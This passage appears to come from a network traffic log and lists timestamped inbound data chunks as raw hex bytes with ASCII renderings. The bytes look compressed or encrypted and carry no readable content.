c9 fe e4 d7 f0 28 c0 14 91 c2 fc 11 32 f8 ab ae 2e 7f 82 be d7 17 c0 e7 ba 7f a0 12 5f 52 f2 ef 8e d6 02 ac 63 a9 f6 ee 2d 67 b8 f4 e5 5f d4 88 d7 b5 Data Ascii: l14#lG0&"5xFjNfv_[(2'vt2@U#7}`29K1sLkRkxQs%:dA7_ob\_Lz3=3V`!Due(2._Rc-g_
2023-10-13 13:21:13 UTC	2312	IN	Data Raw: e4 7e 52 56 30 b9 28 b3 67 3c 78 a6 48 d5 4e 7c dd 00 12 b4 8d ef c0 0f f5 a7 ab b8 e6 56 fe 61 32 6d 36 d8 4b 0f fc bb 70 90 8f 91 82 1e 62 2d e1 13 87 82 c9 34 81 e9 b2 15 9b f7 23 17 16 e4 29 b3 7f be 43 f1 48 d7 51 62 1e 1a 15 77 fc d1 48 3f 57 2d ed 10 00 96 58 6d fe 1f 74 ce 03 71 29 3c 79 fc fd 52 3d f3 46 b4 b2 ac 7f ba c1 bf 78 5f d0 57 68 91 bf 03 3a 85 94 03 77 52 e0 f0 4b 89 6d 4b 6a 71 36 01 3a f2 76 1c 9b 6c 64 8d 04 35 f3 19 5b d4 5f b2 bc 60 43 81 b5 5a c1 29 38 e9 5f 0d b7 5f d6 19 71 b0 e6 fc b6 fe 15 2b 97 81 44 48 39 6b d6 bd 2e 9e 2d 07 52 57 67 86 1a 4a 96 bd 07 3e 8a 28 c9 06 f3 d4 01 52 5c 15 4f a3 e4 d3 3a c6 0c 31 20 f9 12 1a bd 45 a7 6f 3e 31 06 c7 25 46 81 24 8d 9f 53 d3 02 59 6f 50 dd 71 cc fa ba 2f af 86 83 d0 b6 20 63 f0 92 Data Ascii: ~RV0(g<xHN\|Va2m6Kpb-4#)CHQbwH?W-Xmtq)<yR=Fx_Wh:wRKmKjq6:vld5[_`CZ)8__q+DH9k.-RWgJ>(R\O:1 Eo>1%F$SYoPq/ c
2023-10-13 13:21:13 UTC	2328	IN	Data Raw: 7a 95 b4 a0 d5 1d d1 54 2d 0c 2b 45 ee 31 ac b6 2f 4a ee 1f 13 7b 53 09 6e 72 99 30 6a 59 1e 00 2e e4 ca 16 ce 0d d9 31 5e 4e 30 a2 65 fc da 78 1b d9 0e 00 00 f2 e6 d2 65 b1 ce cd c9 99 e2 e9 2b 77 d6 31 0a a2 6e f3 d3 8e f5 d6 e0 1d 2b 50 4e ff 2f 77 fc 62 79 43 c8 74 4d 4f 2b f2 9e c4 5c 9a 32 fc d0 b9 57 f6 11 ed 24 dc 6d e8 d9 a4 e5 2e 11 b6 4c 2a b2 5e 09 96 f9 1d 25 d2 68 33 30 83 9d 26 74 06 16 b4 56 46 9b ef be 78 26 7e 95 d5 44 b7 18 33 f5 65 e4 b4 91 a6 98 97 8e 63 1f 3d e7 6f 2b 73 c3 16 01 07 09 4b 4a 60 2c f3 1f d9 15 2f 71 2a 50 d7 a4 61 ef c9 a2 a4 18 e6 b4 53 06 cd fe 4e 99 2c cf 61 d7 c5 4b e8 19 6e 0d 9b b7 71 bc 04 00 95 1d bf 17 e1 ca ab 92 8d b5 a9 c4 52 0c 6c 3a 74 5a cb ab 11 74 18 8e 66 80 b5 23 38 2b 4d 51 15 87 a6 8a 4c d4 e5 ad Data Ascii: zT-+E1/J{Snr0jY.1^N0exe+w1n+PN/wbyCtMO+\2W$m.L^%h30&tVFx&~D3ec=o+sKJ`,/qPaSN,aKnqRl:tZtf#8+MQL
2023-10-13 13:21:13 UTC	2344	IN	Data Raw: 46 e8 cd 58 59 7b b3 fa a4 eb 72 9a 90 60 c1 c8 13 2d f5 34 73 02 32 13 65 af 11 6a 0d 7b 0a 1d 0b 6d d3 9d 3c 8f ca c9 6b fa 7a 8e d9 cd 74 2a a2 31 13 22 af 84 ed 0b 18 a8 cf bd 99 bb 3a 42 95 27 f7 6a c1 7c 7b 8b a0 cf 42 32 c7 22 60 26 e6 a2 77 a3 24 9d fd 40 30 d7 fa 28 7a 77 7f f2 69 99 92 37 b6 8d 7a 71 84 77 99 1b 8c ea 90 1d ea a8 52 c7 f8 af af 72 40 ac 03 fc 04 a3 39 bf 28 01 29 29 78 13 2a a2 7a 34 fb 23 76 9d 49 07 3e b0 a3 4a 84 48 21 07 55 40 dc 74 be 68 ae 15 01 5f 86 1c 52 d4 df 5d 4c 1d e5 e9 f1 9a bb 37 be 30 08 d7 fc de 8d ab 7e b1 68 05 ab 2c 0d 3c 8d 4b 28 43 36 8f ac ab ae e1 73 c2 19 4c 06 3d 86 53 ae 6d 0c 0b e1 a4 55 9a 62 8f 9f 70 0b 38 02 01 54 dd c6 1e 9d 11 36 e4 8d 87 55 5c 1c 4b 15 f6 1a 81 e2 79 98 d3 d8 a8 ba 59 c9 45 8d Data Ascii: FXY{r`-4s2ej{m<kzt1":B'j\|{B2"`&w$@0(zwi7zqwRr@9())xz4#vI>JH!U@th_R]L70~h,<K(C6sL=SmUbp8T6U\KyYE
2023-10-13 13:21:13 UTC	2360	IN	Data Raw: d9 c4 47 9f f7 7c 97 2a 73 40 9b 0f e2 1a ea 2f e1 31 1b 89 84 59 5c aa 79 c6 cb b8 95 88 0c 0c cd fb d0 8e 5e 3d 9c f2 90 14 33 d5 9e 05 95 b9 c8 27 61 5d bc dd a6 f4 2f 12 93 36 44 25 c2 ab 25 99 77 dd 08 ad aa 8e 19 65 34 95 09 3e 9f 0f 2d b1 37 b5 b1 07 97 e8 b3 b1 0e 29 26 e1 b5 08 9f 1a 0e 37 72 6e bd b4 48 3f f0 91 d1 88 7a 53 c5 ef fb ff a1 21 80 dc 2f 01 cd f7 06 2e 76 57 97 2a 48 b0 c6 38 9f 4a c1 6e 14 ba 64 78 80 66 00 d3 b5 c3 95 a5 4f 2c a8 6b 54 b0 b2 97 56 58 bc cb 9a be 7e 53 f3 9e 77 9b 99 1b a4 01 0d 0a bb ad 62 89 39 aa e6 b3 51 31 45 f6 58 8e 28 80 58 7c b6 c0 7f e6 11 d6 31 db 66 27 9a d3 5b e4 e4 c4 8f 25 58 af 48 e4 17 c0 ac 10 dd 75 06 d9 c8 d8 c1 3b 1c 81 37 a8 12 a3 ea 45 07 5f 62 6b 16 23 d4 d3 74 ad 50 c1 bb a3 68 0f 44 67 9f Data Ascii: G\|s@/1Y\y^=3'a]/6D%%we4>-7)&7rnH?zS!/.vWH8JndxfO,kTVX~Swb9Q1EX(X\|1f'[%XHu;7E_bk#tPhDg
2023-10-13 13:21:13 UTC	2376	IN	Data Raw: ca fe 93 48 38 3f 6d 6f a3 71 fc ad 4b 23 5d 10 e9 53 b3 5e d4 68 77 54 7e 89 33 19 31 30 48 18 0a b5 fa bb 1c e1 70 90 24 c4 8c 8c f6 7a 98 d4 de 86 02 dc b2 8b a8 00 ee eb 89 bc f9 5d bc 18 ce 52 b0 27 3d 10 16 e2 9c 50 be d8 87 c0 e1 e3 51 b4 b8 16 98 67 ad f4 b1 bf 35 d9 45 d6 50 86 a1 6e 8b f3 a6 6a e4 c1 b5 58 b4 76 46 16 48 7b dd 9f 74 f2 49 ee 0f f4 f6 b0 a4 cf cf 8e b3 fb 82 ad 6e 7a 01 34 8f 9b fa 86 06 1d 69 f9 f5 81 a6 fb 6e 3d 7d f6 76 5f fa 9d 04 08 24 e2 60 d2 b0 dc ab ad 9e c5 d7 0b 5f 27 7f 26 e5 1d c0 4f 1f 2e 2b a1 65 c1 4a a1 49 ea b9 04 d4 18 c1 22 6e 4a 1d c1 0b 48 d5 1c 9c 46 a3 0a 77 d8 95 0e 66 0a d5 ae 01 7e c0 ef 97 3f 27 20 cf 75 6c 09 42 79 27 a0 3f 61 d3 58 4b 1e 09 15 e4 a4 aa 5a a8 80 44 84 d3 79 e1 61 42 fb a1 58 79 1a 91 Data Ascii: H8?moqK#]S^hwT~310Hp$z]R'=PQg5EPnjXvFH{tInz4in=}v_$`_'&O.+eJI"nJHFwf~?' ulBy'?aXKZDyaBXy
2023-10-13 13:21:13 UTC	2392	IN	Data Raw: 71 b2 7a 5c 5d ce 77 80 69 7d c7 6d f9 b2 58 32 2a db c4 40 b6 60 6f 8f 5e d0 4d 3e 06 63 0f f8 4e c1 44 56 ef 04 0e bf 56 eb c5 25 4a 83 9b 16 9d bc d6 07 ff b2 ce 9e 52 32 08 68 b2 67 53 60 13 dd 1b 6b 2a f8 dc b1 23 07 63 8b e9 fc 0b 18 19 54 38 a9 e8 ab dd cb 80 ae cf 8d 23 2c cd c8 3c f7 33 a0 c6 79 7a a4 de d3 f9 ee 45 17 7d da 90 45 54 3b 1c 34 81 65 b8 1d 07 6e 74 79 0e 80 a8 5d 92 cd fe 93 90 f4 c9 c8 51 76 d3 24 f0 db 5e 62 12 b6 3b 22 e3 31 65 bc d1 70 ef fc e2 3a 6f 0b 2e 84 ad 2d 58 13 58 18 d7 91 5f 0b 29 bc 46 a7 24 d0 39 f3 e5 e6 25 c7 07 61 2c 80 f6 ca dd 70 96 03 9e 78 34 94 1f fc bc d7 e9 8c 6e ea 73 f0 b2 da c0 5a 06 61 51 e5 c4 9b 44 19 78 a5 ed 2c 69 20 2d 35 0e ff 07 4f 71 0c 19 4a 41 a3 79 cf 49 3b 03 52 dd b8 d0 eb f8 32 3c ed c0 Data Ascii: qz\]wi}mX2@`o^M>cNDVV%JR2hgS`k#cT8#,<3yzE}ET;4enty]Qv$^b;"1ep:o.-XX_)F$9%a,px4nsZaQDx,i -5OqJAyI;R2<
2023-10-13 13:21:13 UTC	2408	IN	Data Raw: 74 b5 42 76 37 97 a2 a7 91 bf e7 ec ba 0a 55 b8 91 15 cf 8d 76 38 9a 48 35 96 71 3a c8 f3 88 e3 8b a7 82 8e 38 3c 99 29 73 70 d0 33 de 04 2e 85 47 8d 75 f9 bb 52 6d ed fa e3 f5 b5 3c 05 d7 f0 9c b0 b2 d0 33 b5 a1 1d 67 15 f4 f4 48 5d 8b d0 9f 0e 6f f7 b8 f1 d5 7e c1 ac 5d b3 e5 4a e1 16 33 57 61 bd 9a 48 77 12 5e 42 17 f4 c8 eb d4 5c 90 e8 b5 d3 b4 46 03 29 96 50 56 bb 6c c6 3b bc 09 d4 e1 6c af ff 27 01 81 8a 1c d0 b9 e3 e1 7b 5f 21 ef be 4e 66 e3 7b 55 20 a4 7d d1 02 87 ad 46 34 f6 65 7d c7 6a 5c 99 40 64 b8 c8 4f 2f 14 cc d1 e0 c5 47 a8 01 f2 31 39 42 c1 66 80 36 9e ad e9 38 f1 5b 5c 41 9c 17 f3 ad 13 8f 9f 5a b8 b5 ee 2d 8a 34 be cb f0 cc e9 21 ad bc ad ee 4c 68 e9 e6 9f 7c a9 8d 23 29 6a 58 e5 23 7e 96 c3 54 fd 29 9d 7a 82 07 5e ef 2e 0a a2 9e bd c4 Data Ascii: tBv7Uv8H5q:8<)sp3.GuRm<3gH]o~]J3WaHw^B\F)PVl;l'{_!Nf{U }F4e}j\@dO/G19Bf68[\AZ-4!Lh\|#)jX#~T)z^.
2023-10-13 13:21:13 UTC	2424	IN	Data Raw: f5 67 93 d3 3e 8f 56 98 41 cb 5c 30 e3 04 28 ab 82 80 76 7d c9 ee ec 53 52 c3 b2 49 9d 2b 5d c6 f1 ea 84 27 7d 10 40 89 e5 60 54 08 58 0c cf 4d df 46 cb 5a 73 aa 97 13 45 b9 70 89 dc 3c f6 59 89 bf 0d df b4 50 ab ee f8 6c f2 78 f6 a9 00 c7 93 d7 12 7f 98 a1 b9 98 98 62 4e 57 ab 85 3a c8 09 cc 65 ef ad 31 cc df b2 3f dc 04 5e 1e fc 7e 6a 8f 7d a5 16 2d 0d 89 f8 fc 88 17 83 ac c1 16 59 73 32 cb 36 1b 4d 3d ea fd 52 ec 33 45 a5 74 f2 e6 76 a7 a7 02 f8 8f 7e 58 80 4f a3 11 6f c5 a9 26 4c e7 49 bc 8e d2 e5 ea 87 3b 8b a4 d1 ab 5b 52 1a 77 8e 63 15 7b b0 ff cf f6 93 7c 1e 68 80 f1 b7 8b 70 83 0f 5c 8c 9f 38 68 6c 17 62 55 48 be 88 e7 a3 0e eb 9c 3e 1b 05 85 78 77 6c 84 28 5d fa 26 60 d2 07 50 d7 e0 17 39 84 b0 de 3b 67 20 9d 91 6a 5f 9c 53 93 81 46 50 c9 83 21 Data Ascii: g>VA\0(v}SRI+]'}@`TXMFZsEp<YPlxbNW:e1?^~j}-Ys26M=R3Etv~XOo&LI;[Rwc{\|hp\8hlbUH>xwl(]&`P9;g j_SFP!
2023-10-13 13:21:13 UTC	2440	IN	Data Raw: 03 f7 69 97 98 de b1 49 07 38 c7 eb e2 67 cd 99 72 69 37 b6 66 17 47 6d 9f 7f b1 81 fd 33 12 59 1d b3 c7 b8 3c d4 29 fa dc 61 f3 bf 2d b2 11 18 04 ea 13 29 c2 66 27 97 bd a6 54 4e 6f dd 80 a7 b8 67 ae 08 81 7c f4 28 fa 04 c1 a9 b3 9d 80 6c fa 7e 01 98 f7 32 1c ea 12 fb cc 62 d5 8f 20 b1 b3 d0 44 56 ee 40 f5 fa 74 5b 8f 60 88 c7 6a 90 af d5 59 58 d1 b1 00 76 73 8d 4e 6c 03 50 4b 8b 54 d1 ca 25 13 10 97 3b a1 77 2b 4f d5 14 63 b7 39 6b 34 cc eb 6a 66 4b 06 26 41 e5 3c 37 73 0c 8f a4 42 15 75 fc 3c dc e0 1a 95 1f d8 2d 85 d9 ef 47 21 f7 f1 a2 58 81 45 53 f8 3f b2 13 24 81 3c 8c 95 40 92 15 fc f8 98 3f 95 f4 30 28 74 35 ae fe 58 24 ef bc d1 30 c0 40 34 26 17 d8 6a 42 a8 ad 35 c1 28 58 23 cc c7 21 dc df 92 ae 70 9e 89 93 c5 69 fc 31 66 60 7a 2c 67 25 20 8f 95 Data Ascii: iI8gri7fGm3Y<)a-)f'TNog\|(l~2b DV@t[`jYXvsNlPKT%;w+Oc9k4jfK&A<7sBu<-G!XES?$<@?0(t5X$0@4&jB5(X#!pi1f`z,g%
2023-10-13 13:21:13 UTC	2456	IN	Data Raw: 0e b8 5a 1a a5 e8 18 93 a3 46 69 f0 d7 bf 4e dd b6 1f b8 79 03 e4 87 2d 33 aa 69 55 2b 34 c4 90 5c 58 71 6c 8d 23 7e 40 7f 89 ab 2f 66 f8 81 04 af d4 f6 cb 7f 25 c8 40 95 8a 11 c6 79 29 c2 1e 5f 8e e5 1c 1c 64 17 9a de 57 a4 c3 6b 35 4b c4 a4 a0 a3 bf 81 02 6e 68 e8 39 66 5e 98 04 da 5b 0f 65 46 a6 35 b6 85 0d 67 aa a7 16 6e 56 80 f3 a6 5d 4c 14 cb 3e e2 1c 15 c8 20 a1 53 44 ab 0a ac 79 02 77 f5 cb 79 d5 87 82 6d 34 9a 0b 9b b6 1e ec 51 87 0a 8d 09 a9 7c 76 53 50 b9 14 06 14 4d 3e e8 ee e1 a1 b8 d7 2a ed fe aa cc d6 17 95 5c 0b c3 c7 64 01 ee 9f 35 68 fc 89 b9 14 27 db 5a 22 68 03 e7 3d bc 29 e9 11 59 b7 6f 35 9f ff 41 62 37 39 ac e2 38 69 02 31 36 74 f3 84 cf 02 1c 44 ba bd fd 55 72 fa cb d1 ce 08 a7 47 fb fc b1 c1 5b 34 4f b8 d1 e7 9e 27 59 a8 71 d5 78 Data Ascii: ZFiNy-3iU+4\Xql#~@/f%@y)_dWk5Knh9f^[eF5gnV]L> SDywym4Q\|vSPM>*\d5h'Z"h=)Yo5Ab798i16tDUrG[4O'Yqx
2023-10-13 13:21:13 UTC	2472	IN	Data Raw: ca 9c 1b 81 2f ae e5 a2 63 22 ba f7 b7 78 39 d6 40 0e f0 a7 9d 9d e7 4e 3b ec 3a 30 fa d9 b0 1b 14 de 91 2a f9 54 ba a1 16 11 1e 5c 7b 34 97 01 37 cf 9d 9e c6 04 2d ce 59 0d fc 7f ba ac 46 1a f0 ce 1c 61 ea 33 3d c3 b8 46 46 48 36 2f 5c 58 f1 90 58 c6 0a f0 c5 46 21 ed 93 02 0b 09 52 33 86 78 44 3e 23 f2 54 a4 da c0 72 90 54 26 e0 8d 24 0e 56 1b 64 d1 bb a3 57 4c 18 89 41 b4 3c a1 83 5d 28 85 86 27 6b f4 01 6d f3 0e 2e 82 b7 04 25 73 9f da 83 11 51 74 0b cc 73 c2 34 cb 01 b2 5a 9e fd 1f 99 74 cf b5 72 06 77 65 8d 3f 59 b8 81 33 4b 05 31 7e fe c5 00 66 ed 8f 8c 6c a4 a4 2f aa 24 55 84 0f 69 e9 53 50 50 77 97 a0 ef 9b 7e 8d c7 76 89 c2 96 22 f1 d7 93 73 ff 0b 41 7a e7 52 b3 7e 93 de 06 32 60 1f 26 73 d4 cf dd 78 2f bf 87 44 04 c1 54 87 b7 1c b6 9c b6 75 b6 Data Ascii: /c"x9@N;:0*T\{47-YFa3=FFH6/\XXF!R3xD>#TrT&$VdWLA<]('km.%sQts4Ztrwe?Y3K1~fl/$UiSPPw~v"sAzR~2`&sx/DTu
2023-10-13 13:21:13 UTC	2488	IN	Data Raw: 0d be 3b 38 cd e0 74 77 b7 a5 63 d6 31 7e 94 22 e6 da 6e 7f 49 e8 1d 9e 16 f0 5c ec 43 2d bc 20 1b c2 f5 67 63 6d 58 40 29 1f b3 84 19 e8 cb 02 ea 08 17 16 8b 28 9c 85 b4 55 a2 66 e3 79 b6 5b 2d 16 f2 cf a4 48 82 2c a6 6b f4 c7 be 93 40 66 3e 5c b7 30 39 e6 da 40 07 74 37 2d b2 0d dc e4 d0 f5 be 11 50 33 fb 8e ca f5 c4 49 a5 d1 b5 65 cd 8a 46 5a a1 42 14 c1 a1 cd 79 f5 ac 7c b7 a3 73 38 c8 eb ea 8d b2 ef 42 7b 71 aa ed f0 82 78 ce df f9 da 36 71 01 1f b7 73 e2 6a 4e 15 5e ff f2 7a d3 49 54 ac c7 ae 5f 1c d3 50 ad b7 9d ac 56 c7 9d c3 83 0f 2d a7 bc 29 8f 48 ea 1b 28 5e 85 b0 6f 11 58 e3 29 d6 46 06 76 15 e5 57 9d 61 e1 ee 38 d8 e6 0d 11 ea cc 3f c5 de e4 f3 b8 b6 6e 71 79 c7 94 35 a4 c4 aa b1 73 23 4e 4c b3 ea df 33 f5 9c ac 03 d5 5c 41 08 8f d0 28 1e 87 Data Ascii: ;8twc1~"nI\C- gcmX@)(Ufy[-H,k@f>\09@t7-P3IeFZBy\|s8B{qx6qsjN^zIT_PV-)H(^oX)FvWa8?nqy5s#NL3\A(
2023-10-13 13:21:13 UTC	2504	IN	Data Raw: 0d 8e b4 3a cb f8 78 b7 1d 19 41 89 f0 74 c3 f2 66 48 b4 86 f1 54 e9 99 14 8a 36 43 00 bc 0b aa e4 28 ba 5d fb 6e cc 4b 16 cb 56 22 6e f4 86 07 59 1d 2f 60 a8 5d d1 41 35 4c 79 19 4f c5 07 b6 5b 8d 0e 5a 03 89 75 1c 0f 58 b7 63 c9 a0 ba 06 37 b5 ce e4 ea 8d 7a 41 00 9b 74 c7 1d 52 08 63 09 d5 c7 db 15 72 78 6c 9a b3 ed ea 3f 4c 4b 83 f9 9b e5 48 55 6d ef 92 11 c5 47 32 7d f6 39 c5 2f c6 eb 5d 6c 5a a1 a8 a2 10 f3 72 c4 84 13 0d 51 74 7c 8c c9 c2 22 2f 94 dd 35 d3 00 d6 57 45 3a 24 fb 34 2f 6c d4 2f e9 09 4a b4 55 1f 35 9a 36 bf 41 65 48 d3 9a 2a c2 6c 82 06 4f fb 60 ac 0e 01 ba 1e 13 cb 0d b0 df 1e ec 63 67 71 9b 99 32 b0 e9 8f 89 75 ec d3 16 f9 6a 39 09 80 e6 f0 44 ca fd 5c fb 1a 30 0d 7c 17 08 40 7b 8d 59 50 ca d0 df 68 4f c9 ef dc a7 72 c9 f0 c6 40 27 Data Ascii: :xAtfHT6C(]nKV"nY/`]A5LyO[ZuXc7zAtRcrxl?LKHUmG2}9/]lZrQt\|"/5WE:$4/l/JU56AeH*lO`cgq2uj9D\0\|@{YPhOr@'
2023-10-13 13:21:13 UTC	2520	IN	Data Raw: c7 22 c5 6c 63 55 33 39 a8 91 c7 2e 0c 06 16 fe 0a 26 9f 25 68 45 6b 04 3f a9 23 89 86 6b b9 0b f2 4a 77 77 ad 37 3c cc 3b 89 a7 d0 c2 ca 98 52 0d 81 c2 cc c6 46 17 06 0c e8 09 23 91 fd da 23 30 6d b1 33 9c 73 a9 37 d4 3c 7b 02 e8 21 ed ba e0 1a 18 55 7b 47 72 95 4f c8 c7 77 ec fb 83 74 0e 9b b4 db 06 06 35 b9 5e ee f7 e2 13 80 21 0b 6e f4 85 39 06 11 3d e9 90 be a4 62 6f b2 2a 51 97 5c a9 65 98 99 6f 9e a3 c5 46 7a 12 43 0c b2 9e a9 1b 43 74 f2 94 26 c4 09 3c fe 30 30 31 6d bf 68 06 7d 43 1b 49 d2 48 20 d1 26 bd 1a 71 ca 37 5e 23 84 ef bd 83 08 c1 be 29 4f 18 8e fb c3 bb d9 df 17 c8 1b 0a 7d 3f 88 3e 2f 02 a4 3c 5f 75 36 f5 25 4d f6 66 63 b4 4c 7b 78 d2 73 cf f3 8e b8 aa e0 53 8f d0 e6 d0 1b a4 8f ac 60 af 27 26 ef c1 d1 f5 d0 ab ca 22 e8 31 b0 58 22 08 Data Ascii: "lcU39.&%hEk?#kJww7<;RF##0m3s7<{!U{GrOwt5^!n9=bo*Q\eoFzCCt&<001mh}CIH &q7^#)O}?>/<_u6%MfcL{xsS`'&"1X"
2023-10-13 13:21:13 UTC	2536	IN	Data Raw: d8 41 9c 22 1d 42 05 68 ca b9 1b d5 8f e8 28 74 fc 34 fb c3 a4 64 c9 c8 d9 72 20 89 0b dd 2e 47 e7 36 31 a7 6f 12 ee 11 18 ac 57 d9 c0 c9 be 15 5f 80 73 04 86 e7 d6 34 fd 4e f7 f6 8b 3f ee d9 00 cf ae 08 53 b5 1b 39 f1 72 2c 40 32 f9 bf f8 fe fd f2 2e ea 6c bf 27 27 ea eb 66 84 a9 c2 62 89 05 4d 33 6a 73 0d 6a ae 64 0b c2 a1 dd fd 6e dd 96 08 d8 5e 04 e4 dd a6 7d 35 71 40 11 94 f7 a2 d6 08 a3 34 fa 57 39 82 dd 7d 72 d9 d7 c5 a9 03 62 d9 1d cf 8e 8c 73 37 29 10 f9 50 6e bf a9 80 ab f3 f9 72 df 8b c3 01 06 ef 2f 2b f1 8a cb 63 2a 65 54 64 92 7e a2 c2 e8 7e b5 ec 82 72 58 96 0c 7b 2a ab 8f ff 40 32 17 84 88 b4 e5 db 3d 5f 0e 2e 36 be 24 93 a6 64 ef 92 ef 7b a4 61 50 3c 3e b9 e4 b5 56 c5 0c 4e 77 89 cb 54 5c fd f7 e1 07 53 21 87 c0 cb 3a 74 f4 a1 ec e0 36 f5 Data Ascii: A"Bh(t4dr .G61oW_s4N?S9r,@2.l''fbM3jsjdn^}5q@4W9}rbs7)Pnr/+ceTd~~rX{@2=_.6$d{aP<>VNwT\S!:t6
2023-10-13 13:21:13 UTC	2552	IN	Data Raw: 86 12 26 af b9 08 79 fb fc b5 3f 60 bc 5b 63 79 26 a6 f3 e3 8e 7c 00 6c 08 8c 02 99 16 cd ad 14 7d c3 50 2c e8 7e a2 9d 95 7a b6 fc 71 29 35 d0 58 ca a8 09 4a 0c 10 61 0e c7 e8 c8 06 c2 7a 00 7f 97 b7 19 da 6e 8c 17 39 30 14 24 73 a6 b5 72 08 35 33 68 8f 86 9b 6a e2 9c 10 47 2b f1 94 ba 7c a5 23 f3 43 47 19 e5 c1 b5 67 c8 86 d4 cd ce ac 23 96 3e b3 96 ed 8f b0 72 cc 10 b1 1e b1 d2 ef 8e f8 d3 0f 2a 7f 62 e7 15 ef 3a c4 b7 ed 08 9f d3 01 4b df 9f f4 49 2f ba df b0 d7 d2 a7 2c 3c ae 7d 25 aa b3 cc 08 05 8b 47 bf 78 2e 23 21 63 f5 5f 72 52 00 26 9d 7c 0b da 61 32 e1 53 71 2a 45 dd cb ee 52 a1 ae bf 54 3f 89 46 70 39 92 f3 35 11 12 bf e2 10 f7 10 d9 e5 3f d4 15 4d 0b 2a 58 15 dd 1f 04 cb d6 9c 29 84 26 9a 27 ee db dd e8 3f ae 04 a5 ed e3 33 4c 19 1b 69 5d e9 Data Ascii: &y?`[cy&\|l}P,~zq)5XJazn90$sr53hjG+\|#CGg#>rb:KI/,<}%Gx.#!c_rR&\|a2SqERT?Fp95?M*X)&'?3Li]
2023-10-13 13:21:13 UTC	2568	IN	Data Raw: e3 80 5c c8 a4 26 c7 78 3f 4b 86 55 66 54 77 63 98 ea 16 73 78 14 21 4d ed 94 31 f5 5e c2 2c ee c9 94 30 92 a7 6e c2 58 ad 98 da 95 2f 69 8e 92 af f6 0e ea 4b bb 68 26 68 09 0b df 3e 21 76 cc 39 ce e2 8f 5c 9d 66 5f 8a 0e ee 1f 65 b3 8b 2f 84 cb 48 c8 d9 15 94 20 1c e5 75 ee 50 5b a1 84 1d 0e 33 23 e3 62 11 37 9d 80 73 06 bd 8b db b2 5c 72 af 06 85 61 d6 61 06 64 36 76 5a f7 02 03 0e aa 83 b6 e9 97 e6 f4 39 0d 05 93 14 c7 81 c2 f6 92 69 cb 7c 50 e5 d5 4b ff f4 21 ed d8 11 87 f9 ba 67 ee 81 3c 21 03 3b 6d a1 2e 63 1e be 66 c8 00 ba 53 fd f3 d5 e8 9f 41 9e a7 d5 89 57 4e 3b de fa 3e fc 6d b3 83 66 33 b4 6e 0b 9c c3 94 f2 2b 46 6f 92 49 f2 80 0f 66 e9 0d fc 06 86 02 9b a7 4f 52 64 a8 7d 2a 4b f8 b9 37 ac e7 28 b6 70 d6 65 e7 4e 0e e9 c4 f6 c2 9b 94 2b cb d3 Data Ascii: \&x?KUfTwcsx!M1^,0nX/iKh&h>!v9\f_e/H uP[3#b7s\raad6vZ9i\|PK!g<!;m.cfSAWN;>mf3n+FoIfORd}*K7(peN+
2023-10-13 13:21:13 UTC	2584	IN	Data Raw: bf 16 53 8c 46 e7 81 73 d7 4f 9e ee 5a 85 f5 20 f1 d5 90 65 f5 04 b4 90 18 56 d1 77 5e 2c 71 a8 bb 16 95 41 99 a5 08 09 e1 52 1f 4a 7c bf 0a 14 e4 26 97 bf ac c3 aa 78 72 90 c8 ea 46 2f d5 8d b2 c2 5d 0d 7c 6b 07 b2 92 99 03 9c b9 4f 6b 6b 12 0b 19 ef c9 ce c8 a5 1d d1 f7 c7 0e e1 7c 1e 37 2a d9 2c 60 7c 79 30 06 c9 27 b5 76 67 01 c3 ec ff 83 78 53 a1 db 27 ae a3 6d e7 59 aa 1a 12 03 6e e6 a3 80 97 69 7b 84 30 7c ab d8 88 e6 bf 03 74 da f6 30 df c7 66 23 57 f2 2a fb 05 d9 10 3d 92 a7 b7 d4 7f 54 60 6e 6d 63 d0 f9 31 3e 3b 9c 31 54 94 4f bf 64 48 6c 26 01 e1 86 23 5a 80 c0 1a 6e 16 df 99 83 c9 3d 52 cd 2d 85 c3 d3 40 af 46 58 36 4d 4a bb 45 cd de fd 95 e9 c0 4f 6a cd 8a 33 10 48 bd 3c eb 2b 97 24 3b 74 5a a3 e2 18 ff ff c9 44 cb ba 3a 5b 4a ca e6 41 7b d1 Data Ascii: SFsOZ eVw^,qARJ\|&xrF/]\|kOkk\|7,`\|y0'vgxS'mYni{0\|t0f#W=T`nmc1>;1TOdHl&#Zn=R-@FX6MJEOj3H<+$;tZD:[JA{
2023-10-13 13:21:13 UTC	2600	IN	Data Raw: 16 a0 a5 e7 4d 30 1e 86 34 54 81 8b bd 35 d3 49 b3 79 a1 74 02 a3 4f 61 e6 3f a2 78 e2 b3 d0 0e 18 85 5f b2 2c 20 0a 63 ab a7 51 4d 0d 69 f5 83 88 43 b9 84 4f d2 37 91 3f 35 80 12 41 2b 23 fe 55 6e 84 65 87 b6 9a 66 be 67 96 2e 3b b9 1a 38 63 da 71 b1 5f 39 2f c2 9d bc f7 51 32 78 fb 09 32 aa c9 eb 4b 17 e5 3f eb 03 74 49 5e 5c 3d 35 10 bd 5a 68 06 b6 53 a4 d3 bf 67 5c 27 8b 30 78 5e 01 95 cc 91 d6 ec b5 02 17 92 61 67 43 83 2e 98 1b 7b b0 57 eb 79 26 0f de 17 71 b7 fc ad 64 7d 7f bf 93 e0 54 be 5f 1d eb e3 a2 72 69 56 78 3b a4 be 8b 90 60 f1 ad b1 aa 90 99 a8 d9 dc 5f 6a e4 69 58 91 38 10 24 3c 9b d2 a0 26 2c dc ed fc 37 23 c3 30 b8 e4 ea a6 90 e6 e1 a8 cc b0 e0 1b 6b db eb b8 5a 9d 84 f4 ac ef 51 34 03 0f 73 52 b8 cb 79 65 bd 15 84 40 61 56 e0 d4 a3 3c Data Ascii: M04T5IytOa?x_, cQMiCO7?5A+#Unefg.;8cq_9/Q2x2K?tI^\=5ZhSg\'0x^agC.{Wy&qd}T_riVx;`_jiX8$<&,7#0kZQ4sRye@aV<
